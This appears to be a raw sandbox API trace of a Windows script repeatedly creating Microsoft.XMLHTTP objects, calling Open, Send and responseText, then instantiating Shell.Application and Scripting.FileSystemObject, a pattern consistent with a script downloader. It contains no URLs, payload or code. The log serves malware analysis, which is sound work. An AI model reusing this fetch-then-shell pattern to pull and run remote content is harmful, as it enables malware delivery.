	[0383.192] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0383.192] XMLHTTPRequest:IUnknown:Release (This=0x49c5c28) returned 0x0
	[0383.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bc0) returned 0x0
	[0383.192] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bc0) returned 0x3
	[0383.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0383.192] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0383.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0383.192] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0383.192] SysStringLen (param_1=0x0) returned 0x0
	[0383.192] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0383.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0383.193] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0383.193] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0383.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7788) returned 0x0
	[0383.193] ??2@YAPEAX_K@Z () returned 0x62f310
	[0383.193] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7788, pUnkSite=0x62f310) 
	[0383.193] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0383.193] XMLHTTPRequest:IUnknown:Release (This=0x49c7788) returned 0x0
	[0383.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0383.193] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0383.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0383.193] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0383.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0383.193] longjmp () 
	[0383.193] longjmp () 
	[0383.194] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0383.194] SysStringLen (param_1=0x0) returned 0x0
	[0383.194] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0383.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0383.194] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77d0) returned 0x0
	[0383.194] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0383.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7838) returned 0x0
	[0383.194] ??2@YAPEAX_K@Z () returned 0x62f330
	[0383.194] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7838, pUnkSite=0x62f330) 
	[0383.194] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0383.194] XMLHTTPRequest:IUnknown:Release (This=0x49c7838) returned 0x0
	[0383.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77d0) returned 0x0
	[0383.194] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77d0) returned 0x3
	[0383.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0383.194] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0383.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0383.194] longjmp () 
	[0383.195] longjmp () 
	[0383.195] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0383.195] SysStringLen (param_1=0x0) returned 0x0
	[0383.195] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0383.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0383.195] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c50) returned 0x0
	[0383.195] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0383.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7788) returned 0x0
	[0383.195] ??2@YAPEAX_K@Z () returned 0x62f310
	[0383.195] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7788, pUnkSite=0x62f310) 
	[0383.195] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0383.195] XMLHTTPRequest:IUnknown:Release (This=0x49c7788) returned 0x0
	[0383.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c50) returned 0x0
	[0383.195] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c50) returned 0x3
	[0383.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0383.196] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0383.196] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0383.196] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0383.196] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0383.196] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0383.988] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0383.989] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0383.989] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0383.989] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0383.989] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0383.989] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0383.989] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0383.989] SysStringLen (param_1=0x0) returned 0x0
	[0383.989] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0383.989] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0383.990] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0383.990] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0383.990] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0383.990] ??2@YAPEAX_K@Z () returned 0x62f350
	[0383.990] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0383.990] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0383.990] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0383.990] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0383.990] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0383.990] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0383.990] SysStringLen (param_1=0x0) returned 0x0
	[0383.990] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0383.993] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0383.993] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0383.993] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0383.993] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0383.993] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0383.993] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0385.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0385.001] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0385.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0385.002] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0385.002] SysStringLen (param_1=0x0) returned 0x0
	[0385.002] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0385.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0385.003] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c50) returned 0x0
	[0385.003] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0385.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0385.003] ??2@YAPEAX_K@Z () returned 0x62f310
	[0385.003] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
